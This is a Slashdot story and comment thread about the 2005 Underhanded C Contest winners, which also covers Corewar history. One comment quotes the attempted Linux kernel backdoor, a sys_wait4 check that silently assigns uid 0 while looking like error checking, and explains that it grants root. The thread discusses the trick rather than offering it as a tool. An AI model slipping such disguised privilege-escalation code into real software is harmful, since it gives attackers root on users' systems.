Underhanded C Contest announces winners

Matthew Skala writes "The 2005 Underhanded C Contest has announced its winners: the team entry from M Joonas Pihlaja and Paul V-Khuong, and the solo entry from Natori Shin. The contest (which appeared on Slashdot in June) tests programmers' ability to hide malicious behaviour in innocent-seeming code, making it a kind of evil shadow twin to the International Obfuscated C Contest."

Just what the world needs...

[goldspider]

...more malicious code writers.

Thanks be to Slashdot for giving them the recognition/praise they so richly deserve.

I'm still fond of this one

[$RANDOMLUSER]

This one almost made it into the Linux kernel. It looks like error checking until you read it carefully.Short, brilliant and to the point.

if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
retval = -EINVAL;

In other words, you become root if you call sys_wait4()with the __WCLONE|__WALL) flags

Story here and here

Re:I'm still fond of this one

[jnf]

all of my code gets -Wall -Werror -pedantic, i more do constants on the left out of habit now, but i dont think its a bad idea, or ugly.

Also note that -pedantic wouldn't create a warning, but gcc -Wall would.

Re:Bill Gates Entry

[makomk]

Very true. For those of you who don't get it, one of the winners uses a technique very similar to the way Word (all versions AFAIK) leaks data into documents - an uninitialised buffer.

Re:Bill Gates Entry

[Richard_at_work]

Found an interesting thing at work recently, during trials of VB.net and the .Net framework. Our VB.net programmers applications worked right up until one day, when suddenly, they stopped working. Simple things like messages in Message Boxes stopped appearing, or labels on buttons went astray, mouse cursor changes on mouseover events showing black boxes instead of the image. Very wierd we thought. He reinstalled the .Net framework, VS.Net, everything he could think of but nothing rectified the problems. We eventually found out what the problem was - McAffee Virus protection now includes buffer overrun protection. Turn that off, and everything worked fine. Wierd, just wierd.

Re:Will Code For Beer

[drsquare]

I fear for those who have to live with you.

Why? I don't exactly go round killing people. Drink is just another liquid.

What's with the moralising, anti-alcohol mods today? Slashdot's always whining about people's rights to do what they want with their own body, what about my right to drink? Why should that be censored?

Corewar veterans

[lastfish]

Joonas & Paul are both Corewar veterans being respectively co-authors of Son of Vain (Joonas P & Ian Oversby) top of the all-time hall-of-fame and nPaper II (Paul V-K & John Metcalf) dominant paper of its time.

Good practice for writing obscure, but useful, code.

I'd give clickable links but fear for these sites under load.

www.corewar.info/
www.corewar.co.uk/94nophof.txt

OT, nPaper II's ownership

[pkhuong]

John's a corewar god (all that 6502 assembly probably has something to do with that ;), so nPaper is nearly all his: the constant twiddling (by hand!), the QS, etc. All I did was basically write the framework for the paper; the only non-standard parts were the attack engine and the djn at the end of the timescape component... and I believe the djn was removed, because, even though it was more aggressive, it was effective than a checksum with a jmz. Read CoreWarrior #.. erh. I think it was it the high 70s or low 80s. John describes the process of optimising a newbie's paper (nPaper), all by hand (He might have used some BASIC scripting :).

Even now that we have evolvers throwing tons of computing power at a relatively small search space (nano), John submitted something that rocketted to 1st place and manages more than 50% wins. Again, the dude is a corewar genius.

Paul(-Virak) Khuong

PS, note the position of the dash